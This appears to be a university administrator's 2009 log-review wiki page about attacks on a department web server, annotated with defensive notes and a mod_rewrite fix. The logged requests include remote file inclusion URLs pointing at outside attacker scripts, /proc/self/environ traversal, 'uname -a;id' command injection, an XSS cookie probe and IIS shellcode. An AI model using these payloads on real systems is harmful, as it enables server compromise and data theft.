====== attempts on the new server ====== [[http://ws.arin.net/whois/]] ===== attempts at bouncing off of server ===== logwatch clue: 404 errors: /news.php?_SERVER[DOCUMENT_ROOT]=http://ww ... ote_log/ec.txt?: 1 Time(s) [root@bacchus httpd]# grep 'ote_log/ec.txt' * access_log.1:217.117.85.108 - - [10/May/2009:00:01:10 -0400] "GET /news/news.php?_SERVER[DOCUMENT_ROOT]=http://www.ionthenet.co.kr/note_log/ec.txt? HTTP/1.1" 200 22071 access_log.1:217.117.85.108 - - [10/May/2009:00:01:10 -0400] "GET /news.php?_SERVER[DOCUMENT_ROOT]=http://www.ionthenet.co.kr/note_log/ec.txt? HTTP/1.1" 404 5275 ec.txt ===== hacked files on old server ===== Need to check ./hps-html/vids/thumbs/index.php [root@bacchus www]find . -user apache -iname index.php -exec ls -Flat {} \; -rwxrw-r-- 1 apache web-admin 3008 Jul 13 2005 ./aoe-html/computing/faq/index.php* -rw-rw-r-- 1 apache web-admin 1302 Aug 23 2005 ./aoe-html/computing/manuals/index.php -rwxrw-r-- 1 apache web-admin 1162 Aug 23 2005 ./aoe-html/computing/index.php* -rw-r--r-- 1 apache apache 18126 Nov 29 2006 ./aoe-html/organizations/vtsgt/delete this folder/index.php -rwxrwxr-x 1 apache web-admin 3038 Jan 23 2006 ./aoe-html/research/facilities/dyppir/index.php* -rw-r--r-- 1 apache apache 168 Apr 15 03:07 ./hps-html/vids/thumbs/index.php -rwxrw-r-- 1 apache web-admin 2272 Jan 31 2006 ./secure-html/computing/online/index.php* [root@bacchus www]# cat ./hps-html/vids/thumbs/index.php == files dropped in these locations which were writeable by apache == www.sssl.aoe.vt.edu/documentation/hardware_components/top www.sssl.aoe.vt.edu/simplePHPblog/ www.aoe.vt.edu/organizations/aiaa/lutze www.aoe.vt.edu/organizations/vtsgt ===== nikto report ===== [root@traininglt nikto]# ./nikto.pl -host 128.173.188.87 - Nikto v2.03/2.04 --------------------------------------------------------------------------- + Target IP: 128.173.188.87 + Target Hostname: bacchus.ipv4.aoe.vt.edu + Target Port: 80 + Start Time: 2009-05-12 15:34:28 --------------------------------------------------------------------------- + Server: Apache/2.2.3 (Scientific Linux) - /robots.txt - contains 3 'disallow' entries which should be manually viewed. (GET) + No CGI Directories found (use '-C all' to force check all possible dirs) - Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE + OSVDB-877: HTTP method ('Allow' Header): 'TRACE' is typically only used for debugging and should be disabled. This message does not mean it is vulnerable to XST. + OSVDB-0: Retrieved X-Powered-By header: PHP/5.1.6 + OSVDB-0: ETag header found on server, inode: 32375282, size: 111, mtime: 0xb976d0c0 + Apache/2.2.3 appears to be outdated (current is at least Apache/2.2.9). Apache 1.3.39 and 2.0.61 are also current. + OSVDB-637: GET /~root - Enumeration of users is possible by requesting ~username (responds with 'Forbidden' for users, 'not found' for non-existent users). + OSVDB-0: GET /index.php?module=My_eGallery : My_eGallery prior to 3.1.1.g are vulnerable to a remote execution bug via SQL command injection. + OSVDB-877: TRACE / : TRACE option appears to allow XSS or credential theft. See http://www.cgisecurity.com/whitehat-mirror/WhitePaper_screen.pdf for details + OSVDB-12184: GET /index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000 : PHP reveals potentially sensitive information via certain HTTP requests which contain specific QUERY strings. + OSVDB-3092: GET /phpmyadmin/ : phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts. + OSVDB-3092: GET /phpMyAdmin/ : phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts. + OSVDB-3093: GET /index.php?base=test%20 : This might be interesting... has been seen in web logs from an unknown scanner. + OSVDB-3093: GET /index.php?IDAdmin=test : This might be interesting... has been seen in web logs from an unknown scanner. + OSVDB-3093: GET /index.php?pymembs=admin : This might be interesting... has been seen in web logs from an unknown scanner. + OSVDB-3093: GET /index.php?SqlQuery=test%20 : This might be interesting... has been seen in web logs from an unknown scanner. + OSVDB-3093: GET /index.php?tampon=test%20 : This might be interesting... has been seen in web logs from an unknown scanner. + OSVDB-3093: GET /index.php?topic=<script>alert(document.cookie)</script>%20 : This might be interesting... has been seen in web logs from an unknown scanner. + OSVDB-3268: GET /icons/ : Directory indexing is enabled: /icons + OSVDB-3233: GET /icons/README : Apache default file found. + 3577 items checked: 20 item(s) reported on remote host + End Time: 2009-05-12 15:35:07 (39 seconds) --------------------------------------------------------------------------- + 1 host(s) tested Test Options: -host 128.173.188.87 -------------------------------------------------------------------------- =====WWW2===== [root@webtest ~]# grep "sciencedirect" /var/log/httpd/* /var/log/httpd/access_log.3:218.246.113.84 - - [25/Apr/2009:05:24:19 -0400] "GET http://www.sciencedirect.com/ HTTP/1.1" 200 25042 "-" "Mozilla/5.0 (compatible; MSIE 5.01; Win2000)" /var/log/httpd/access_log.4:58.252.189.17 - - [16/Apr/2009:09:56:03 -0400] "GET http://www.sciencedirect.com/science/subscriptionSummary/4875/J HTTP/1.1" 404 328 "-" "Mozilla/5.0 (compatible; MSIE 5.01; Win2000)" /var/log/httpd/access_log.4:219.231.151.44 - - [18/Apr/2009:05:36:10 -0400] "GET http://www.sciencedirect.com/ HTTP/1.1" 200 25068 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)" *Above appears to be an attempt to use us as a proxy to get to sciencedirect.com, which may filter by ip address, and our address would allow accemss because it is a Virginia Tech Libraries resource **Reccomended Action: block URI requests via mod_rewrite in htaccess I can't answer your root question, but here's a band-aid (requires mod_rewrite): RewriteEngine on RewriteRule ^/?http:// - [F] This will send a 403-Forbidden response for any request for "http://" or "/http://" followed by any URI. "GET /phpMyAdmin-2.6.1-rc2/main.php HTTP/1.0" 404 316 "-" "-" *These are ok to ignore, phpMyAdmin is installed but only accessible to us "SEARCH /\x90\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\...\x90\x90\x90\x90... *This was an attempt to attack via an IIS vulnerability, no worries here, we're not using a windows based web server "GET /thisdoesnotexistahaha.php HTTP/1.1" *This is an attempt to get the type of webserver and OS being used *Solution: > Why don't you create a file with that name, or at least a redirect > statement in httpd.conf, that redirects the request to > "yesitdoeshehe.php". ;) % cat > yesitdoeshehe.php #!/bin/bash echo 'Content-type: text/plain' echo echo These are not the PHP scripts you are looking for. exit 0 ^D % chmod +x yesitdoeshehe.php "GET /xmlrpc.php HTTP/1.0" ; "GET /*/main.php" *Attempt to exploit an xmlphp vulnerability via remote sql injection *We're safe here, fixed in php 5.0.5 and we're on 5.1.6 =====May 10, 2009 Log Analysis===== Bacchus 05/10/2009 Log Review ============================= 80.179.24.50 /index.php?inc=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP Response 200 An attempt to read the /proc/self/environ file, fails, does nothing but take the user to the main page. ///skin/zero_vote/login.php?dir=http://fst ... ditors/id.txt??: 1 Time(s) I cannot tell what this one is doing, unable to find any information other than reports of others having this entry in their logs as well **Keep an eye on this one until we know what it does //favorites.php?nuke_bb_root_path=http://h ... age/img/image??: 1 Time(s) Vulnerability in PhP Nuke Platform, we don't use this. //templates/beez/index.php?act=http://www. ... /v6id.txt??????: 1 Time(s) Again, can't find any relevatin information to this entry **Keep a watch on it /MSOffice/cltreq.asp?UL=1&ACT=4&BUILD=4518 ... MVER=4&CAPREQ=0 Harmless, used by IE to determine if Office Server Extensions are enabled /_vti_bin/owssvr.dll?UL=1&ACT=4&BUILD=4518 ... MVER=4&CAPREQ=0 Something to do with Exchange 2003, don't think this concerns us but keep a watch out for it again /academics/?PHPSESSID=6df789551664bd593103f8ccb27191c5 Traces back to google, perhpas its crawler? Actually its the same IP and PHPSESSID for each entry in the log where this occurs, leads me to believe it is the Google crawler /alumni/alumnilist.php?class=http://144.20 ... 666/index.html? ...No clue, traces back to amsterdam /alumni/main/at/?continental-airline-tickets-3/: 1 Time(s) /alumni/main/at/?last-minute-airline-tickets-3/: 1 Time(s) **IP traces back to Yahoo, possbly it's crawler?** /awstats.pl?configdir=%7Cecho%20;echo%20;i ... o%20;echo%20%7C We dont appear to use awstats /calendars/windtunnel/index.php?PHPSESSID= ... on=comment1%2C+: 20 Time(s) /calendars/windtunnel/index.php?PHPSESSID= ... on=comment2%2C+: 8 Time(s) /calendars/windtunnel/index.php?PHPSESSID= ... on=comment3%2C+: 20 Time(s) /calendars/windtunnel/index.php?PHPSESSID= ... on=comment4%2C+: 11 Time(s) /calendars/windtunnel/index.php?PHPSESSID= ... on=comment5%2C+: 20 Time(s) /calendars/windtunnel/index.php?PHPSESSID= ... on=comment6%2C+: 12 Time(s) **No idea, tracing back to Amsterdam, all returning 404's /cgi-bin/acart/acart.pl?&page=%7Cuname%20-a;pwd;id%7C Hard to find information, however it is a known exploit (php injection), worth looking into. *When adding files back, check if they're cgi. /cgi-bin/awstats.pl?configdir=%7Cecho%20;e ... o%20;echo%20%7C Again with awstats, need to check if we do have it /cgi-bin/index.cgi?page=%7Cuname%20-a;id%7C: 1 Time(s) Again back to Amsterdam /cgi-bin/kerbynet?Section=NoAuthREQ&Action ... ype=*%22;id;%22: 1 Time(s) Amsterdam again, Allows remote execution of code on ZeroShell ***Go through and check for all cgi occurences, foreign hits on many of them*** /errors.php?error=http://www.ayj.ca/buggsbunny?? Unsure, traces back to Amsterdam, Latin America /horde/services/help/?show=about&module=;% ... thru(%22id%22); Attempted attack on a mail system, we don't use it /labsupport/labequipment.php?selfimageresi ... e=400&ysize=200 Don't think this is anything to worry about, looks like just trying to load images onto a page that are resized by a php script /organizations/aiaa/index.php?go=calendar/ ... o/pics/id.txt?? Looks normal after all. /organizations/index.php?inc=../../../../. ... oc/self/environ: 1 Time(s) /organizations/index.php?inc=../../../../. ... self/environ%00: 1 Time(s) Trying to access the environ file again, still didn't work /organizations/sname/ingalls02pics/plas%25 ... 2520cutting.jpg: 2 Time(s) Look normal after all /organizations/vtsgt/index.php?inc=../../. ... oc/self/environ: 1 Time(s) Again a failure /people/include/vtweb_html_1.12/assets/js/widgets.js: 81 Time(s) Just a bug in our code /saffairs/pages/s/?free-credit-score-no-credit-card-3/: 1 Time(s) Yahoo! crawler, intereseting hit though /services/help/?show=about&module=;%22.passthru(%22id%22); Amsterdam again. Another horde attempt, we don't use it, so no worries here. /twiki/bin/configure?action=image;image=%7Cid%7C;type=text Amsterdam. =====May 13, 2009 Log Analysis===== 404's /%7eyongkm/java/thin/: 1 Time(s) 79.23.132.70 - - [12/May/2009:21:05:42 -0400] "GET /%7eyongkm/java/thin/ HTTP/1.1" 404 6624 [stedwar1@hephaistos ~]$ host 79.23.132.70 70.132.23.79.in-addr.arpa domain name pointer host70-132-dynamic.23-79-r.retail.telecomitalia.it. ///skin/zero_vote/ask_password.php?dir=htt ... schmasik.txt???: 2 Time(s) 210.118.194.200 - - [12/May/2009:05:34:28 -0400] "GET /~mason/Mason_f/747CONF.INP%20///skin/zero_vote/ask_password.php?dir=http://203.253.145.192/zb41//skin/zero_vote/ruschmasik.txt??? HTTP/1.1" 404 5311 210.118.194.200 - - [12/May/2009:05:34:28 -0400] "GET ///skin/zero_vote/ask_password.php?dir=http://203.253.145.192/zb41//skin/zero_vote/ruschmasik.txt??? HTTP/1.1" 404 5271 210.118.194.200 - - [12/May/2009:05:34:28 -0400] "GET /~mason/Mason_f///skin/zero_vote/ask_password.php?dir=http://203.253.145.192/zb41//skin/zero_vote/ruschmasik.txt??? HTTP/1.1" 404 5247 //DOCUMENT_ROOT=http://irc.harazuku.co.cc/ ... sponz/id2.txt??: 4 Time(s) 199.120.90.222 - - [12/May/2009:12:55:14 -0400] "GET /~cwoolsey/Courses/AOE3134/Supplemental/RootLocusTechnique.pdf//DOCUMENT_ROOT=http://irc.harazuku.co.cc/2002/.sh/responz/id2.txt?? HTTP/1.1" 404 5297 //ee_commerce/paypalcart.php?toroot=http:/ ... /cms//uiu.txt??: 3 Time(s) //gmapfactory/params.php?gszAppPath=http:/ ... alog/safe1.txt?: 1 Time(s) //skin/zero_vote/error.php?%20dir=http://l ... .mw.lt/id.txt??: 1 Time(s) //skin/zero_vote/setup.php?%20dir=http://d ... wap.sh/id.txt??: 2 Time(s) //sources/join.php?FORM[url]=owned&CONFIG[ ... /vip/id2.txt???: 1 Time(s) //surveys/survey.inc.php?path=http://www.r ... %20%20/id.txt??: 1 Time(s) /3DLDV/wb23000/data.html: 1 Time(s) /MSOffice/cltreq.asp?UL=1&ACT=4&BUILD=4518 ... MVER=4&CAPREQ=0: 1 Time(s) /MSOffice/cltreq.asp?UL=1&ACT=4&BUILD=6403 ... MVER=4&CAPREQ=0: 1 Time(s) /MSOffice/cltreq.asp?UL=1&ACT=4&BUILD=8164 ... MVER=4&CAPREQ=0: 2 Time(s) /_vti_bin/owssvr.dll?UL=1&ACT=4&BUILD=4518 ... MVER=4&CAPREQ=0: 1 Time(s) /_vti_bin/owssvr.dll?UL=1&ACT=4&BUILD=6403 ... MVER=4&CAPREQ=0: 1 Time(s) /_vti_bin/owssvr.dll?UL=1&ACT=4&BUILD=8164 ... MVER=4&CAPREQ=0: 2 Time(s) /_vti_bin/shtml.exe/_vti_rpc: 9 Time(s) /_vti_inf.html: 9 Time(s) /alumni/alumnilist.php?class=1983&PHPSESSI ... d54ef3dc75f883d: 1 Time(s) /calendars/windtunnel/index.php?PHPSESSID= ... on=comment1%2C+: 7 Time(s) /calendars/windtunnel/index.php?PHPSESSID= ... on=comment2%2C+: 9 Time(s) /calendars/windtunnel/index.php?PHPSESSID= ... on=comment3%2C+: 8 Time(s) /calendars/windtunnel/index.php?PHPSESSID= ... on=comment4%2C+: 7 Time(s) /calendars/windtunnel/index.php?PHPSESSID= ... on=comment5%2C+: 9 Time(s) /calendars/windtunnel/index.php?PHPSESSID= ... on=comment6%2C+: 17 Time(s) /cgi-bin/mt/mt-comments.cgi: 6 Time(s) /cgi-bin/mt/mt-comments.cgi?entry_id=1329: 1 Time(s) /cgi-bin/mt/mt-comments.cgi?entry_id=1330: 1 Time(s) /cgi-bin/mt/mt-comments.cgi?entry_id=1331: 2 Time(s) /cgi-bin/mt/mt-comments.cgi?entry_id=699: 1 Time(s) /cgi-bin/mt/mt-tb.cgi?__mode=view&entry_id=1329: 1 Time(s) /cgi-bin/mt/mt-tb.cgi?__mode=view&entry_id=1330: 1 Time(s) /cgi-bin/mt/mt-tb.cgi?__mode=view&entry_id=1331: 1 Time(s) /classes/aoe3054/: 2 Time(s) /classes/aoe3054?PHPSESSID=1939caa884433834315b4a00b6e35ac0: 1 Time(s) /classes/aoe3054?PHPSESSID=1c7615b28cf141183322809db94ce0a4: 1 Time(s) /classes/aoe3054?PHPSESSID=7916107b13fccab81eb4211c633deccf: 1 Time(s) /classes/aoe3054?PHPSESSID=981a9739aad37ad1536582db69788eae: 1 Time(s) /cms/components/com_joomlaboard/faq.php: 1 Time(s) /cms/components/com_mamboboard/faq.php: 1 Time(s) /components/com_joomlaboard/faq.php: 1 Time(s) /components/com_mamboboard/faq.php: 1 Time(s) /computing/: 2 Time(s) /computing/faq/displayfaq.php?area_id=3: 1 Time(s) /computing/faq/displayfaq.php?area_id=6: 1 Time(s) /password.php?skin_board_path=http://www.i ... /upload/ec.txt?: 1 Time(s) /people.html: 1 Time(s) /people/bgfac.html: 3 Time(s) /people/clifffac.html: 1 Time(s) /people/davenfac.html: 2 Time(s) /people/include/vtweb_html_1.12/assets/js/widgets.js: 1 Time(s) /people/josfac.html: 2 Time(s) /people/masfac.html: 5 Time(s) /people/robfac.html: 1 Time(s) /research/?area_id=2: 1 Time(s) /research/?area_id=3: 1 Time(s) /research/?area_id=4: 1 Time(s) /research/?area_id=6: 1 Time(s) /research/thesis/?mode=area_selected&thesis_area=3: 1 Time(s) /research/thesis/?mode=area_selected&thesis_area=4: 1 Time(s) /research/thesis/?mode=area_selected&thesis_area=6: 1 Time(s) /research/thesis/index.php?mode=area_selected&thesis_area=2: 1 Time(s) /research/thesis/index.php?mode=area_selected&thesis_area=3: 1 Time(s) /research/thesis/index.php?mode=area_selected&thesis_area=5: 1 Time(s) /research/thesis/index.php?mode=area_selected&thesis_area=6: 1 Time(s) /saffairs/pages/r/?canada-free-credit-report-2/: 1 Time(s) /shop/locale/?Aarp-health-insurance-5/: 1 Time(s) /site/components/com_joomlaboard/faq.php: 1 Time(s) /site/components/com_mamboboard/faq.php: 1 Time(s) /usr/local/lib/netscape/docs/images/poweredsgi.GIF: 2 Time(s) /wordtrans/wordtrans.php: 1 Time(s) /~cwoolsey//ee_commerce/paypalcart.php?tor ... /cms//uiu.txt??: 3 Time(s) /~cwoolsey/Advisees//ee_commerce/paypalcar ... /cms//uiu.txt??: 3 Time(s) /~cwoolsey/Advisees/Undergraduate//ee_comm ... /cms//uiu.txt??: 3 Time(s) /~cwoolsey/Advisees/Undergraduate/FaruqueA ... /cms//uiu.txt??: 3 Time(s) /~cwoolsey/Courses/3104: 1 Time(s) /~cwoolsey/Courses/AOE3034/index_files/editdata.mso: 1 Time(s) /~cwoolsey/Courses/AOE3134/Supplemental//D ... sponz/id2.txt??: 4 Time(s) /~cwoolsey/Courses/AOE3134/Supplemental/Ro ... sponz/id2.txt??: 4 Time(s) /~dare/me/punk/rocker.html: 1 Time(s) /~grasmeye/photos/allison/billstory.html: 1 Time(s) /~gurdal/Public/COURSES/4084-Docs/..%5C408 ... CTutorial-09.nb: 1 Time(s) /~gurdal/Public/COURSES/4084-Docs/..%5C408 ... WORK%5CHW03.pdf: 1 Time(s) /~gurdal/Public/COURSES/5064-Docs/TUTORIALS/IPLamDes.nb: 1 Time(s) /~gurdal/gurdal.gif: 2 Time(s) /~hokiesat/Presentations_and_Papers/AFRL%2 ... orqueValues.pdf: 1 Time(s) /~hokiesat/subs/software/ION-F%20Software% ... ation%20Set.doc: 1 Time(s) /~hokiesat/subs/systems/HokieSatDocMatrix_files/oledata.mso: 1 Time(s) /~hokiesat/subs/systems/ION-FMassSS.xls: 1 Time(s) /~hokiesat/subs/wiring/New%20Stuff/Update% ... /upload/ec.txt?: 1 Time(s) /~hokiesat/subs/wiring/New%20Stuff/passwor ... /upload/ec.txt?: 1 Time(s) /~hokiesat/subs/wiring/password.php?skin_b ... /upload/ec.txt?: 1 Time(s) /~grasmeye/photos/allison/billstory.html: 1 Time(s) /~gurdal/Public/COURSES/4084-Docs/..%5C408 ... CTutorial-09.nb: 1 Time(s) /~gurdal/Public/COURSES/4084-Docs/..%5C408 ... WORK%5CHW03.pdf: 1 Time(s) /~gurdal/Public/COURSES/5064-Docs/TUTORIALS/IPLamDes.nb: 1 Time(s) /~gurdal/gurdal.gif: 2 Time(s) /~hokiesat/Presentations_and_Papers/AFRL%2 ... orqueValues.pdf: 1 Time(s) /~hokiesat/subs/software/ION-F%20Software% ... ation%20Set.doc: 1 Time(s) /~hokiesat/subs/systems/HokieSatDocMatrix_files/oledata.mso: 1 Time(s) /~hokiesat/subs/systems/ION-FMassSS.xls: 1 Time(s) /~hokiesat/subs/wiring/New%20Stuff/Update% ... /upload/ec.txt?: 1 Time(s) /~hokiesat/subs/wiring/New%20Stuff/passwor ... /upload/ec.txt?: 1 Time(s) /~hokiesat/subs/wiring/password.php?skin_b ... /upload/ec.txt?: 1 Time(s) /~lscharf/scripts//surveys/survey.inc.php? ... %20%20/id.txt??: 1 Time(s) /~mason//ee_commerce/paypalcart.php?toroot ... /cms//uiu.txt??: 3 Time(s) /~mason//skin/zero_vote/error.php?%20dir=h ... .mw.lt/id.txt??: 1 Time(s) /~mason//skin/zero_vote/setup.php?%20dir=h ... wap.sh/id.txt??: 2 Time(s) /~mason/Mason//sources/join.php?FORM[url]= ... /vip/id2.txt???: 1 Time(s) /~mason/Mason/ACiFlyWngs.html/: 1 Time(s) /~mason/Mason/ACinfoTOC.html%22%20%20targe ... /vip/id2.txt???: 1 Time(s) /~mason/Mason/ACinfoTOC.html//sources/join ... /vip/id2.txt???: 1 Time(s) /~mason/Mason/http%20://www.aoe.vt.edu/~ma ... /ACinfoTOC.html: 1 Time(s) /~mason/Mason_f/(null): 1 Time(s) /~mason/Mason_f///skin/zero_vote/ask_passw ... schmasik.txt???: 2 Time(s) /~mason/Mason_f//ee_commerce/paypalcart.ph ... /cms//uiu.txt??: 3 Time(s) /~mason/Mason_f//skin/zero_vote/error.php? ... .mw.lt/id.txt??: 1 Time(s) /~mason/Mason_f//skin/zero_vote/setup.php? ... wap.sh/id.txt??: 2 Time(s) /~mason/Mason_f/747CONF.INP%20%20//skin/ze ... wap.sh/id.txt??: 1 Time(s) /~mason/Mason_f/747CONF.INP%20///skin/zero ... schmasik.txt???: 2 Time(s) /~mason/Mason_f/747CONF.INP//skin/zero_vot ... .mw.lt/id.txt??: 1 Time(s) /~mason/Mason_f/747CONF.INP//skin/zero_vot ... wap.sh/id.txt??: 1 Time(s) /~mason/Mason_f/CAtxtTop.html%0dCAtxtTop.html%20%a0%0dpaper.: 1 Time(s) /~mason/Mason_f/M96SAE.pdf%20%20//skin/zer ... wap.sh/id.txt??: 1 Time(s) /~mason/Mason_f/M96SAE.pdf//skin/zero_vote ... .mw.lt/id.txt??: 1 Time(s) /~mason/Mason_f/M96SAE.pdf//skin/zero_vote ... wap.sh/id.txt??: 1 Time(s) /~mason/Mason_f/M96SC02.pdf/: 1 Time(s) /~mason/Mason_f/M96SC10.pdf%22%20%20lang=% ... _w/safe1.txt???: 2 Time(s) /~mason/Mason_f/MorphFinalRptF03.pdf//ee_c ... /cms//uiu.txt??: 3 Time(s) 405 Method Not Allowed /~mason/: 4 Time(s) =====May 14, 2009 Log Analysis===== A total of 5 sites probed the server 194.83.8.126 209.87.194.21 222.124.24.77 85.241.14.188 87.106.253.45 Requests with error response codes 400 Bad Request /: 1 Time(s) 403 Forbidden /: 7 Time(s) /bannerimages/: 1 Time(s) /bannerimages/campioli/thumb3.jpg: 1 Time(s) /bannerimages/campioli/thumb5.jpg: 1 Time(s) /bannerimages/caplab/thumb1.jpg: 2 Time(s) /bannerimages/caplab/thumb2.jpg: 2 Time(s) /bannerimages/caplab/thumb3.jpg: 1 Time(s) /bannerimages/caplab/thumb4.jpg: 1 Time(s) /bannerimages/caplab/thumb5.jpg: 1 Time(s) /bannerimages/casper/thumb1.jpg: 1 Time(s) /bannerimages/hpc/thumb5.jpg: 1 Time(s) /bannerimages/ldv: 1 Time(s) /bannerimages/ldv/ldv_full.jpg: 1 Time(s) /bannerimages/ldv?PHPSESSID=1c7615b28cf141183322809db94ce0a4: 1 Time(s) /bannerimages/ldv?PHPSESSID=22cc899a2ed407ea5541c6c32983a5bc: 1 Time(s) /bannerimages/ldv?PHPSESSID=39009e253e4feede42a7520c2fcf3bb5: 1 Time(s) /bannerimages/ldv?PHPSESSID=f859e1faff216a325754f18ce8f8fc42: 1 Time(s) /bannerimages/nsl/iambus_www.jpg: 1 Time(s) /bannerimages/orange_effect?PHPSESSID=4755 ... 633b481e5eecf69: 1 Time(s) /bannerimages/orange_effect?PHPSESSID=9a26 ... e78794c0e442bb9: 1 Time(s) /bannerimages/orange_effect?PHPSESSID=ff6c ... 3f3241c117c4568: 1 Time(s) /bannerimages/phantom/thumb1.jpg: 2 Time(s) /bannerimages/phantom/thumb2.jpg: 1 Time(s) /bannerimages/phantom/thumb3.jpg: 1 Time(s) /bannerimages/phantom/thumb4.jpg: 1 Time(s) /bannerimages/sssl/hokiesat.jpg: 1 Time(s) /bannerimages/tbw/lmas_full.jpg: 1 Time(s) /bannerimages/tbw/lmas_www.jpg: 1 Time(s) /bannerimages/volant/thumb1.jpg: 1 Time(s) /bannerimages/volant?PHPSESSID=47a86f49197 ... 69d89baee522cef: 1 Time(s) /bannerimages/volant?PHPSESSID=fe410b64284 ... 27088160dead814: 1 Time(s) /bannerimages/vtsrp/ignition.jpg: 1 Time(s) /bannerimages/vtsrp/offrail.jpg: 1 Time(s) /bannerimages/vtsrp/thumb2.jpg: 1 Time(s) /bannerimages/vtsrp/thumb3.jpg: 1 Time(s) /classes/aoe3054?PHPSESSID=1c7615b28cf141183322809db94ce0a4: 1 Time(s) /classes/aoe3054?PHPSESSID=4755f3e63308bb81f633b481e5eecf69: 1 Time(s) /classes/aoe3054?PHPSESSID=6df789551664bd593103f8ccb27191c5: 1 Time(s) /classes/aoe3054?PHPSESSID=7916107b13fccab81eb4211c633deccf: 1 Time(s) /classes/aoe3054?PHPSESSID=a85cdd6ec52ddb3008600f78659ba4a8: 1 Time(s) /favicon.ico: 2 Time(s) /giving/: 1 Time(s) /help: 1 Time(s) /index.php: 1 Time(s) /robots.txt: 38 Time(s) /teststeve.txt: 1 Time(s) /~cdhall/Research/RossIM/AAS03262.bbl: 1 Time(s) /~cdhall/Research/aiaa.bst: 1 Time(s) /~cdhall/Research/gyrostatsearch.doc: 1 Time(s) /~cdhall/courses/exams/LagrangianPrime.aux: 1 Time(s) /~cdhall/courses/exams/LagrangianPrime.bbl: 1 Time(s) /~cdhall/courses/exams/LagrangianPrime.blg: 1 Time(s) /~cdhall/courses/exams/LagrangianPrime.log: 1 Time(s) /~cdhall/index_files/themedata.thmx: 1 Time(s) 404 Not Found /%7Ejing/java/nsfapplets/css/css/backGifs/bk1.gif: 7 Time(s) //admin.php?submit=submit&form_include_tem ... ars/simple.jpg?: 2 Time(s) //ee_commerce/paypalcart.php?toroot=http:/ ... pyright.txt????: 1 Time(s) //include/admin.lib.inc.php?site_path=http ... igen/.../ids???: 1 Time(s) /MSOffice/cltreq.asp?UL=1&ACT=4&BUILD=4518 ... MVER=4&CAPREQ=0: 1 Time(s) /MSOffice/cltreq.asp?UL=1&ACT=4&BUILD=6211 ... MVER=4&CAPREQ=0: 1 Time(s) /MSOffice/cltreq.asp?UL=1&ACT=4&BUILD=6551 ... MVER=4&CAPREQ=0: 4 Time(s) /MSOffice/cltreq.asp?UL=1&ACT=4&BUILD=8164 ... MVER=4&CAPREQ=0: 5 Time(s) /_vti_bin/_vti_aut/author.dll: 1 Time(s) /_vti_bin/owssvr.dll?UL=1&ACT=4&BUILD=4518 ... MVER=4&CAPREQ=0: 1 Time(s) /_vti_bin/owssvr.dll?UL=1&ACT=4&BUILD=6211 ... MVER=4&CAPREQ=0: 1 Time(s) /_vti_bin/owssvr.dll?UL=1&ACT=4&BUILD=6551 ... MVER=4&CAPREQ=0: 4 Time(s) /_vti_bin/owssvr.dll?UL=1&ACT=4&BUILD=8164 ... MVER=4&CAPREQ=0: 5 Time(s) /_vti_bin/shtml.exe/_vti_rpc: 7 Time(s) /_vti_inf.html: 7 Time(s) /alumni/alumnilist.php?class=1969: 1 Time(s) /alumni/alumnilist.php?class=1971: 1 Time(s) /alumni/alumnilist.php?class=1974: 1 Time(s) /alumni/alumnilist.php?class=1976: 1 Time(s) /alumni/alumnilist.php?class=1985: 1 Time(s) /alumni/alumnilist.php?class=1986: 2 Time(s) /alumni/alumnilist.php?class=1995: 1 Time(s) /alumni/alumnilist.php?class=1997: 1 Time(s) /alumni/alumnilist.php?class=2000: 1 Time(s) /alumni/alumnilist.php?class=2001: 2 Time(s) /alumni/alumnilist.php?class=2003: 1 Time(s) /calendars/windtunnel/index.php?PHPSESSID= ... on=comment1%2C+: 10 Time(s) /calendars/windtunnel/index.php?PHPSESSID= ... on=comment2%2C+: 22 Time(s) /calendars/windtunnel/index.php?PHPSESSID= ... on=comment3%2C+: 13 Time(s) /calendars/windtunnel/index.php?PHPSESSID= ... on=comment4%2C+: 20 Time(s) /calendars/windtunnel/index.php?PHPSESSID= ... on=comment5%2C+: 11 Time(s) /calendars/windtunnel/index.php?PHPSESSID= ... on=comment6%2C+: 12 Time(s) /cgi-bin/mt/mt-comments.cgi: 2 Time(s) /cgi-bin/mt/mt-comments.cgi?entry_id=1329: 1 Time(s) /cgi-bin/mt/mt-comments.cgi?entry_id=216: 1 Time(s) /cgi-bin/mt/mt-search.cgi?IncludeBlogs=2&search=powerpoint: 1 Time(s) /cgi-bin/mt/mt-tb.cgi?__mode=view&entry_id=1329: 3 Time(s) /cgi-bin/mt/mt-tb.cgi?__mode=view&entry_id=1331: 1 Time(s) /design/hpa/spgm/index.php?spgmGal=Flight_ ... 22&spgmFilters=: 1 Time(s) /design/hpa/spgm/index.php?spgmGal=Flight_ ... 29&spgmFilters=: 1 Time(s) /design/hpa/spgm/index.php?spgmGal=Flight_ ... 40&spgmFilters=: 1 Time(s) /design/hpa/spgm/index.php?spgmGal=Flight_ ... =0&spgmFilters=: 1 Time(s) /design/hpa/spgm/index.php?spgmGal=Flight_ ... =6&spgmFilters=: 1 Time(s) /errors.php?error=http://home.covenantberk ... s/kampret.jpg??: 2 Time(s) /giving//?_SERVER[DOCUMENT_ROOT]=http://ww ... /bajocdm2.txt??: 1 Time(s) /giving//?_SERVER[DOCUMENT_ROOT]=http://ww ... /upload/ec.txt?: 6 Time(s) /giving//?_SERVER[DOCUMENT_ROOT]=http://ww ... com/allnet.txt?: 1 Time(s) /giving//?_SERVER[DOCUMENT_ROOT]=http://ww ... ote_log/ec.txt?: 3 Time(s) /organizations//index.php?go=http://www.to ... ips_w/id.txt???: 1 Time(s) /organizations/aiaa//index.php?go=http://w ... ips_w/id.txt???: 1 Time(s) /organizations/aiaa/errors.php?error=http: ... s/kampret.jpg??: 1 Time(s) /organizations/aiaa/index.php?go=l%20...// ... ips_w/id.txt???: 1 Time(s) /organizations/aiaa/index.php?go=links: 1 Time(s) /organizations/aiaa/index.php?go=whatwedo: 2 Time(s) /organizations/aiaa/lutze/health/best-viagra.html: 1 Time(s) /organizations/aiaa/lutze/health/buy-cheapest-cialis.html: 1 Time(s) /organizations/aiaa/lutze/health/buy-ciali ... ofessional.html: 1 Time(s) /organizations/aiaa/lutze/health/buy-viagra-pills.html: 1 Time(s) /organizations/aiaa/lutze/health/buying-re ... escription.html: 1 Time(s) 